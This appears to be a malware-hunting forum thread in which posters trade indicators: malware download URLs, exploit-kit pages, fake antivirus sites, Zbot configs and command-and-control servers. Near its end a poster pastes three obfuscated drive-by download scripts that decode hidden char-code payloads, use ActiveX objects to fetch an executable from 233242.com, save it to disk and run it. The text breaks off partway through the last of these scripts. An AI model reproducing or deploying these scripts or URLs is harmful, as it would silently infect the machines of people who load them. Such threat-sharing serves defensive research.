forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/r/15/02c9be1ab189280058cd0585b0abebc8
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/r/3/275eefe4b40b934bedd87eb81b293bfd
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/t
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/g/g.php?1
forwrd.h15.ru/
forwrd.h15.ru/g/ch.gif?funnyst8
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/l/13/85cd1675de836a8cbe767019adf63929
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/l/15/6e107936d7e25cee0060e938e9b23a2a
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/l/3/fa49ddccad9bc56cd081c69078d04b8e
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/r/13/85cd1675de836a8cbe767019adf63929
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/r/15/6e107936d7e25cee0060e938e9b23a2a
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/r/3/fa49ddccad9bc56cd081c69078d04b8e
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/t
oligarh.territory.ru.b3675abf54988eef.axa3.cn/elanguage.cn/
oligarh.territory.ru.b3675abf54988eef.axa3.cn/g/g.php?1
-
exploits/trojan:
pro100biz.cn/yes/index.phphttp://wepawet.iseclab.org/view.php?hash=56cb05532164e0c797b9860ec0bd7f9b&t=1238446331&type=js
-
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe
-
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe
already added some days ago. ;)
http://www.malwaredomainlist.com/mdl.php?search=steer2.co.uk&colsearch=All&quantity=50
-
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe
already added some days ago. ;)
http://www.malwaredomainlist.com/mdl.php?search=steer2.co.uk&colsearch=All&quantity=50
Sorry :'(
Rootkit TDSS
http://91.207.61.180/images/138/v3/file.exe
http://kxc-softwaresportal.com/promo.exe
http://updateserver.info/loads/traff.exe
http://updateserver.info/loads/instcash.exe
http://f-o-r.ms/xpre.tmp
http://f-o-r.ms/xrun.tmp
Mebroot
http://1681online.com/ld/dx/
http://wepawet.cs.ucsb.edu/view.php?hash=79ec6e02b38cad246c44c87dbeb4c2c6&t=1238508047&type=js
Rogue on googlecode like
http://sunbeltblog.blogspot.com/2009/03/google-code-site-used-as-malware.html
http://vlrm.googlecode.com/svn/trunk/
http://ultra-av.googlecode.com/svn/trunk/
Refpron
http://174.133.72.250/p1212/2.0/w.bin
http://mnnz.biz/ar/
http://mnnz.biz/ar/exe.php
-
f-o-r.ms -> seems we've got a jackpot here,heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result
-
f-o-r.ms -> seems we've got a jackpot here,heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result
Malicious Advertising, xrun.exe - xpre.exe and friends
http://www.bluetack.co.uk/forums/index.php?showtopic=18462
;)
-
Lol,Bluetack is pretty much one of the best english-speaking malware hunting forums out there,
but it doesn't really get the attention that it should from the security community unfortunately... :(
-
f-o-r.ms -> seems we've got a jackpot here,heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result
Malicious Advertising, xrun.exe - xpre.exe and friends
http://www.bluetack.co.uk/forums/index.php?showtopic=18462
;)
Ok, Marcel Heler and friends. Well known. ;)
-
Hi everyone, I'm a newbie here. Just want to say hi!
I really like this site and I'm embarrassed that I didn't start to appreciate it sooner.
Anyway, on a daily basis I run across all sorts of crazy stuff and I'm sure you do too. This bizarre little goodie just flashed on my screen so I thought I'd post it here to see what ya think. ???
POST / HTTP/1.0
TagId: xxxxxxxxxxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: search.namequery.com
Content-Length: 15
Pragma: no-cache
Via: 1.1 localhost:80 (squid)
Cache-Control: max-age=259200
Connection: keep-alive
~G.....p...o.\~HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
Content-Type: image/jpeg
Content-Length: 553
Connection: Close
TagId: xxxxxxxxxxx
~. ....MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
Any insight would be appreciated :)
The binary is attached.
-
"binary3" unfortunately seems to be download-corrupted,ie.it's not a valid executable...
Did you grab it via a POST request?
-
"binary3" unfortunately seems to be download-corrupted,ie.it's not a valid executable...
Did you grab it via a POST request?
No, I pulled it from a pcap. Yeah, I noticed that it's broken. The squid proxy likely killed it. What I find bizarre is that it's a POST request, and the server responded by pushing down an apparent binary with a Content-Type: image/jpeg. This isn't exactly normal behaviour. Does anyone have anything on the domain "search.namequery.com"?
-
Google returns a few bad history records from what it seems...
http://www.bfk.de/bfk_dnslogger.html?query=209.53.113.223#result
http://www.google.com/search?q=209.53.113.223
-
Google returns a few bad history records from what it seems...
http://www.bfk.de/bfk_dnslogger.html?query=209.53.113.223#result
http://www.google.com/search?q=209.53.113.223
Ok, this is generated by a program call "computrace" by absolute software. It's laptop "lojack" software
-
Zbot,domain on MDL but different path this time:
http://amnepofig.ru/test/config.bin
http://amnepofig.ru/test/loader.exe
-
hxxp://bublik.biz/in.cgi?2 // Newer domain hosted over at 88.198.48.247...
Redirects to ->
hxxp://cximnik.cn/img2/index.php // Already spotted in previous days...pdf exploits etc.
= = = = = = = = = = = = = = = = =
hxxp://basesrv3.net/update/main.exe
Result: 9/40 (22.5%):
http://www.virustotal.com/analisis/bc75d1265dcad80564f03cfb3cc1e1ae
-
Exploit/Trojan:
murka-best.com/include/spl.phphttp://wepawet.iseclab.org/view.php?hash=f6e9a5645ca288e481b17453d05491d0&t=1238524847&type=js
Trojan:
luks5.cn/unique/1.exehttp://www.virustotal.com/analisis/9cec63d35bafded6092bee37132e6e0a
-
hxxp://213.155.6.33/new/controller.php?action=bot&entity_list=One more c&c server in the same netblock,213.155.6.32 already spotted couple days ago...
hxxp://213.155.4.82/new/controller.php?action=bot&entity_list=C&C server,213.155.4.80 also spotted earlier in the same netblock...
For sparsha - as i know he has a special preference in fake AVs... :)
hxxp://pornorawa.com
hxxp://sys-scan-1.biz
hxxp://sys-scanner-1.biz/download.php?page=
hxxp://www.system-protector.net/
Few more fake AVs...
hxxp://pcsolutionshelp.com/
hxxp://download.pcsolutionshelp.com/secure/fb4b4716a45f37c3694efcab0d41ee69/49d376e5/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
hxxp://malwareremovingtool.com/
hxxp://download.malwareremovingtool.com/secure/ab3dc06cc30452c69f2a70caf88d36bb/49d376e5/AntiMalwareGF_Rezer.exe
hxxp://download.malwareremovingtool.com/ -> Open dir...have fun ;-)
-
http://www.megaupload.com/?d=8L92M1AS
Just in case they take notice of it quickly and fix the directory read permissions,
i've archived the contents of download.malwareremovingtool.com:
58mb archive containing 22 executables,no password needed...
-
Exploits/trojan
http://megabot.cn/index.phphttp://wepawet.iseclab.org/view.php?hash=a95957a8b26780652b9900b284787dbc&t=1238602058&type=js
Redirects to exploits:
http://loskut.cn/cotton.htmlhttp://wepawet.iseclab.org/view.php?hash=286bf4c04744e908b56a31102a09ac69&t=1238590602&type=js
http://ufomany.by.ruhttp://wepawet.iseclab.org/view.php?hash=fdb7fd5376b78cb765a7c9611b9bd053&t=1238595797&type=js
Zbot:
http://211.95.79.114/load/ldr.exehttp://www.virustotal.com/analisis/3800cd2ec6b09e059fcbe102d7e54b39
-
List I was working on before i had my memory loss. ???
http://amnepofig.ru/test/loader.exe
http://www.mydataporch.com/bot.exe
http://www.cplnn.com/bbot.exe
http://web.cplnn.com/mmf32.exe
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/podmena.exe
http://edwardhomepage.info/172.exe
http://edwardhomepage.info/88.exe
http://edwardhomepage.info/adv.exe
http://edwardhomepage.info/podmena.exe
http://usabreakingnews.com/172.exe
http://usabreakingnews.com/88.exe
http://usabreakingnews.com/adv.exe
http://usabreakingnews.com/fuck3.exe
http://tmr-unlimited.com/172.exe
http://tmr-unlimited.com/setup.exe
http://tmr-unlimited.com/adv.exe
http://tmr-unlimited.com/fuck3.exe
http://tryithere.net/fuck3.exe
http://tryithere.net/88.exe
http://tryithere.net/l.exe
http://tryithere.net/adv.exe
http://tri-visionhomes.com/im/172.exe
http://tri-visionhomes.com/im/podmena.exe
http://tri-visionhomes.com/im/adv.exe
http://tri-visionhomes.com/im/s.exe
http://keepongoing.info/172.exe
http://keepongoing.info/secure.exe
http://211.95.78.66/ruzs/readme.txt
http://91.212.65.12/o9s833f/uerty/setup.exe
http://91.212.65.12/o9s833f/uerty/upd_beta.exe
http://195.88.80.150/myfiles/123/v302/file.exe
http://193.138.173.160/myfiles/100/v300/file.exe
http://193.138.173.160/myfiles/123/v302/file.exe
http://77.221.153.174/.c/o/rdr.exe
http://basesrv.net/base/kernel32.exe
http://91.207.61.180/images/138/v3/file.exe
http://aksajans.com/gif/nfr.exe
http://aksajans.com/gif/pp.03.exe
http://211.95.78.66/log/ldr.txt
http://powelldirects.com/stat/main.exe
http://zyujgss.com/zos/ue.exe
http://incredible.kiev.ua/suez/ldr.exe
I think many are gone bye bye now. :-\
-
Zbot:
http://ctuf.info/ldr.exe
http://ctuf.info/cfg.bin
http://zeus-logs.biz/ldr.exe
http://zeus-logs.biz/cfg.bin
-
paksusic.cn/nuc/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=54bef4b232fec015b149b37a0c11fb9a&t=1238703827&type=js
http://www.virustotal.com/analisis/5566b16433e8c935625315dd76f619bf
-
Exploit which leads to trojan on MDL already:
http://dnsmytruedns.com/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=a6ddc93d17f80b8200c9dffa41b5a3a0&t=1238704964&type=js
Other trojan there:
http://dnsmytruedns.com/nuc/exe.phphttp://www.virustotal.com/analisis/20fbf18e0a83f244a8a9a9a68068db80
Redirect to exploits:
http://aaaimmigration.com/http://wepawet.iseclab.org/view.php?hash=7cb8f06a3c45746da10f644b71027a98&t=1238706643&type=js
Exploits/trojan:
http://p0rn-movies.com/77/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=a2982470cd2fbee7be138128ef6e8d0d&t=1238707074&type=js
Trojan:
http://findwife.asia/unique/1.exehttp://www.virustotal.com/analisis/6eae1c969cc3e7aae2f7ae0982be3bef
Exploit/Trojan:
http://193.200.255.19/~timchenko/cms/index.phphttp://wepawet.iseclab.org/view.php?hash=832a4879ab612a34ba0c854471d72747&t=1238714177&type=js
Redirect to fake Av:
http://kogerta.com/redirect/bucks.php
fake AV :
system-scan-1.biz
Exploit/trojan:
http://hostyapics.net/img/index.phphttp://wepawet.iseclab.org/view.php?hash=9e754a227c062120b20e7864e1e4ed59&t=1238720525&type=js
-
Koobface
http://xviewworldmy1.com/download/1/1000/5
http://viewworldmy1.com/download/1/1000/5
-
exploits/trojan
www.homesy.net/zel/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=e5e78672b3f7a7e8c52cda045bd24bf1&t=1238782592&type=js
http://www.virustotal.com/analisis/445d8300ab224462d9a00448318abe1a
-
exploits/trojan
ispacemac.ru/1/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=049acfef69985d06934cb5d5e5098311&t=1238827604&type=js
http://www.virustotal.com/analisis/13954a7dd49b63eca41859e756b0e0a5
exploits/trojan
2icqmag.ru/mix/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=f1fb4e76dc9849b5a935d5b0d7c65553&t=1238827889&type=js
http://www.virustotal.com/analisis/a766c088385f0b406438e4051e821731
-
Fake AVs
Those ones were reported from Steven as located at zlkon, but we have been moved to ip 64.191.12.38.
antispylinks.com
antispyme.com
antispywareup.com
antiviruscheckout.com
antivirusup.com
goldpcguard.com
pcsecuretools.com
Reported by Anthony
78.26.179.131
best-tube-home.com
78.26.179.137
files.ms-loads-av.com/exe/setup_1_2_1.exe
66.197.154.198
goscanside.com
scan6zoom.com
scan6safe.com
userscan6.com
litescan6.com
209.44.126.14
fastsecurityscan.com
thegreatsecurity.com
truescansecurity.com
topsoftscanner.com/download.php
topsoftscanner.com/install/ws.zip
213.163.65.10
iloveyourbrain.com/scan/
loyal-tube.com/codec.exe
loyaldown99.com/codec.exe
loyaltube09.com/codec.exe
rakompoporyadkunazaryadku.com/codec.exe
ruler-domains.com/codec.exe
setupdatdownload.com/codec.exe
tube-loyal.com/codec.exe
tubeloyal.com/codec.exe
tubeloyaln.com/codec.exe
billingpayment.netcodecs.tubeloyaln.com/codec.exe
lamer.tubeloyaln.com/codec.exe
videosz.tubeloyaln.com/codec.exe
wedare.tubeloyaln.com/codec.exe
velzevuladmin.com/codec.exe
winpcdown09.com/codec.exe
winpcdown99.com/codec.exe
xp-police-09.com/codec.exe
xp-police-2009.com/codec.exe
xp-police-antivirus.com/codec.exe
xp-police-av.com/codec.exe
xp-police-engine.com/codec.exe
xp-police.com/codec.exe
*.xp-police.com/codec.exe
92.38.0.41
wincodecupdate.com/codec.exe
94.76.213.227
antispywareproupdates.com/zsa360/winconfig.dll
78.46.216.233
onlinerobosphere.cn/zsa360/winconfig.dll
212.117.165.126
platinumsecurityupdate.com/zsa360/winconfig.dll
-
Worm Win32/Boupke / Kernelbot (MS08-067)
freegoogla.vicp.net/download/em_setup.exehttp://www.virustotal.com/analisis/b58be0446e889229f163a6364e6279b1
94.23.93.6/firefox.exehttp://www.virustotal.com/analisis/0ff709c880ddbb9c8aa71d67593a0921 2/40
AntiVir 7.9.0.138 2009.04.05 TR/Crypt.XPACK.Gen
McAfee-GW-Edition 6.7.6 2009.04.03 Win32.Malware.dam (suspicious)
http://www.threatexpert.com/report.aspx?md5=39ee3f7eb571d59250df79914a7e8dbb
94.23.93.6/IEXPLORE.exehttp://www.virustotal.com/analisis/ffab02c5126508421194fcf00c6d50d1 5/40
http://www.threatexpert.com/report.aspx?md5=825cd2850f2d0d60d142adb65b35f575
irc.C3llBl0ck.com Port 9595C&C for the firefox.exe and IEXPLORE.exe above.
-
233242.com/1/include/spl.php?do=foxit
233242.com/1/index.php
233242.com/1/load.php
http://www.virustotal.com/analisis/94c84868ce8339d909b4b344275e1710
I believe reports to
newsineurope.net/z/config.bin
newsineurope.net/z/s.php?1=smoked_000de8e6&i=test
newsineurope.net/z/s.php?2=smoked_000de8e6&n=0&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?2=smoked_000de8e6&n=1&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?3=smoked_000de8e6&id=1238936099
233242.com/1/
<style>.dsA86BSFIK_41K{display:none;}</style>
<b class="dsA86BSFIK_41K" id="K_41K1">*e!***v*!*a*l!*</b>
<script>window.onerror = return(true);</script>
<div class="dsA86BSFIK_41K" id="dsA86BSFIK_41K">13.10.118.97.114.32.75.95.52.49.75.65.113.112.32.61.32.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.39.111.98.106.101.99.116.39.41.59.13.10.118.97.114.32.75.95.52.49.75.66.113.112.32.61.32.117.110.101.115.99.97.112.101.40.34.37.52.49.68.37.52.70.68.66.37.50.101.83.116.114.101.97.37.54.68.34.41.59.32.13.10.75.95.52.49.75.65.113.112.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.105.100.39.44.39.75.95.52.49.75.65.113.112.39.41.59.13.10.118.97.114.32.75.95.52.49.75.67.113.112.32.61.32.117.110.101.115.99.97.112.101.40.34.109.115.120.109.108.50.46.88.37.52.68.76.72.37.53.52.84.80.34.41.59.13.10.75.95.52.49.75.65.113.112.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.99.108.97.115.115.105.100.39.44.39.99.108.115.105.100.58.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.39.41.59.13.10.118.97.114.32.75.95.52.49.75.68.113.112.32.61.32.48.59.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.69.113.112.32.61.32.75.95.52.49.75.65.113.112.46.67.114.101.97.116.101.79.98.106.101.99.116.40.75.95.52.49.75.66.113.112.44.34.34.41.59.13.10.75.95.52.49.75.68.113.112.32.61.32.49.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.105.102.32.40.75.95.52.49.75.68.113.112.32.33.61.32.49.41.13.10.123.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.69.113.112.32.61.32.110.101.119.32.65.99.116.105.118.101.88.79.98.106.101.99.116.40.75.95.52.49.75.66.113.112.41.59.13.10.75.95.52.49.75.68.113.112.32.61.32.49.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.125.13.10.105.102.32.40.75.95.52.49.75.68.113.112.32.61.61.32.49.41.13.10.123.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.70.113.112.32.61.32.75.95.52.49.75.65.113.112.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.44.34.34.41.59.13.10.118.97.114.32.75.95.52.49.75.75.113.112.32.61.32.48.120.55.70.70.70.70.70.70.69.59.13.10.118.97.114.32.75.95.52.49.75.71.113.112.32.61.32.110.101.119.32.65.99.116.105.118.101.88.79.98.106.101.99.116.40.75.95.52.49.75.67.113.112.41.59.13.10.75.95.52.49.75.71.113.112.46.111.112.101.110.40.34.71.69.84.34.44.34.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.34.44.102.97.108.115.101.41.59.32.13.10.75.95.52.49.75.71.113.112.46.115.101.110.100.40.41.59.32.13.10.75.95.52.49.75.69.113.112.46.116.121.112.101.32.61.32.49.59.13.10.75.95.52.49.75.69.113.112.46.111.112.101.110.40.41.59.32.13.10.75.95.52.49.75.69.113.112.46.87.114.105.116.101.40.75.95.52.49.75.71.113.112.46.114.101.115.112.111.110.115.101.66.111.100.121.41.59.13.10.118.97.114.32.75.95.52.49.75.72.113.112.32.61.32.34.67.58.92.92.78.84.68.69.84.69.67.84.46.69.88.69.34.59.13.10.75.95.52.49.75.69.113.112.46.83.97.118.101.84.111.70.105.108.101.40.75.95.52.49.75.72.113.112.44.50.41.59.32.13.10.75.95.52.49.75.69.113.112.46.99.108.111.115.101.40.41.59.13.10.75.95.52.49.75.70.113.112.46.83.104.101.108.108.69.120.101.99.117.116.101.40.75.95.52.49.75.72.113.112.41.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.125.13.10</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|*]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("dsA86BSFIK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
<style>.kUbS1mK_41K{display:none;}</style>
<b class="kUbS1mK_41K" id="K_41K1">@e!@@@v@!@a@l!@</b>
<script>window.onerror = return(true);</script>
<div class="kUbS1mK_41K" id="kUbS1mK_41K">75.95.52.49.75.97.110.114.40.41.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.97.110.114.40.41.32.123.13.10.118.97.114.32.75.95.52.49.75.98.110.114.32.61.32.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.39.111.98.106.101.99.116.39.41.59.13.10.75.95.52.49.75.98.110.114.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.105.100.39.44.39.75.95.52.49.75.98.110.114.39.41.59.13.10.75.95.52.49.75.98.110.114.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.99.108.97.115.115.105.100.39.44.39.99.108.39.43.39.115.105.39.43.34.100.58.66.68.34.43.34.57.54.67.53.34.43.39.53.54.45.54.53.65.51.45.49.39.43.34.49.68.48.45.57.56.34.43.39.51.65.45.48.48.39.43.34.67.48.52.34.43.39.70.67.50.39.43.34.57.69.34.43.39.51.54.39.41.59.13.10.116.114.121.32.123.13.10.118.97.114.32.75.95.52.49.75.67.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.39.109.115.39.43.34.120.109.34.43.39.108.50.39.43.34.46.34.43.39.88.77.39.43.34.76.72.34.43.39.84.39.43.39.84.80.39.44.39.39.41.59.13.10.118.97.114.32.75.95.52.49.75.68.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.104.101.108.34.43.34.108.46.65.112.34.43.34.112.108.34.43.34.105.99.97.116.105.34.43.34.111.110.34.44.39.39.41.59.13.10.118.97.114.32.75.95.52.49.75.69.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.39.97.100.39.43.39.111.100.39.43.34.98.46.34.43.39.115.116.39.43.34.114.101.34.43.39.97.109.39.44.39.39.41.59.13.10.116.114.121.32.123.32.75.95.52.49.75.69.110.114.46.116.121.112.101.32.61.32.49.59.13.10.75.95.52.49.75.67.110.114.46.111.112.101.110.40.39.71.39.43.34.69.34.43.39.84.39.44.39.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.39.44.102.97.108.115.101.41.59.13.10.75.95.52.49.75.67.110.114.46.115.101.110.100.40.41.59.32.75.95.52.49.75.69.110.114.46.111.112.101.110.40.41.59.13.10.75.95.52.49.75.69.110.114.46.87.114.105.116.101.40.75.95.52.49.75.67.110.114.46.114.101.115.112.111.110.115.101.66.111.100.121.41.59.13.10.118.97.114.32.75.95.52.49.75.70.110.114.32.61.32.39.46.47.47.46.46.47.47.115.118.99.104.111.115.116.46.101.120.101.39.59.13.10.75.95.52.49.75.69.110.114.46.83.97.118.101.84.111.70.105.108.101.40.75.95.52.49.75.70.110.114.44.50.41.59.13.10.75.95.52.49.75.69.110.114.46.67.108.111.115.101.40.41.59.13.10.125.32.99.97.116.99.104.40.101.41.32.123.125.13.10.116.114.121.32.123.32.75.95.52.49.75.68.110.114.46.115.104.101.108.108.101.120.101.99.117.116.101.40.75.95.52.49.75.70.110.114.41.59.32.125.32.99.97.116.99.104.40.101.41.32.123.125.125.13.10.99.97.116.99.104.40.101.41.123.125.125</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|@]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("kUbS1mK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
<style>.IkZaQm6AojiWK_41K{display:none;}</style>
<b class="IkZaQm6AojiWK_41K" id="K_41K1">^e!^^^v^!^a^l!^</b>
<script>window.onerror = return(true);</script>
<div class="IkZaQm6AojiWK_41K" id="IkZaQm6AojiWK_41K">13.10.118.97.114.32.75.95.52.49.75.65.101.119.61.39.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.39.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.66.101.119.40.111.44.110.41.123.13.10.118.97.114.32.114.61.110.117.108.108.59.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.41.125.99.97.116.99.104.40.101.41.123.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.44.34.34.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.34.34.44.110.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.110.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.110.41.125.99.97.116.99.104.40.101.41.123.125.125.114.101.116.117.114.110.40.114.41.59.13.10.125.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.67.101.119.40.97.41.123.13.10.102.110.97.109.101.61.34.102.105.108.101.46.101.120.101.34.59.118.97.114.32.75.95.52.49.75.68.101.119.61.97.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.99.114.105.112.116.105.110.103.46.70.105.108.101.83.121.115.116.101.109.79.98.106.101.99.116.34.44.34.34.41.59.118.97.114.32.115.97.112.61.75.95.52.49.75.66.101.119.40.97.44.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.41.59.118.97.114.32.120.61.75.95.52.49.75.66.101.119.40.97.44.34.65.68.79.68.66.46.83.116.114.101.97.109.34.41.59.118.97.114.32.75.95.52.49.75.69.101.119.61.110.117.108.108.59.102.110.97.109.101.61.75.95.52.49.75.68.101.119.46.66.117.105.108.100.80.97.116.104.40.75.95.52.49.75.68.101.119.46.71.101.116.83.112.101.99.105.97.108.70.111.108.100.101.114.40.50.41.44.102.110.97.109.101.41.59.120.46.77.111.100.101.61.51.59.13.10.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.105.99.114.111.115.111.102.116.46.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.123.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.83.88.77.76.50.46.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.123.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.83.88.77.76.50.46.83.101.114.118.101.114.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.13.10.123.13.10.116.114.121.13.10.123.13.10.75.95.52.49.75.69.101.119.61.110.101.119.32.88.77.76.72.116.116.112.82.101.113.117.101.115.116.40.41.59.13.10.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.114.101.116.117.114.110.32.48.59.125.125.125.125.13.10.120.46.84.121.112.101.61.49.59.75.95.52.49.75.69.101.119.46.115.101.110.100.40.110.117.108.108.41.59.114.98.61.75.95.52.49.75.69.101.119.46.114.101.115.112.111.110.115.101.66.111.100.121.59.120.46.79.112.101.110.40.41.59.120.46.87.114.105.116.101.40.114.98.41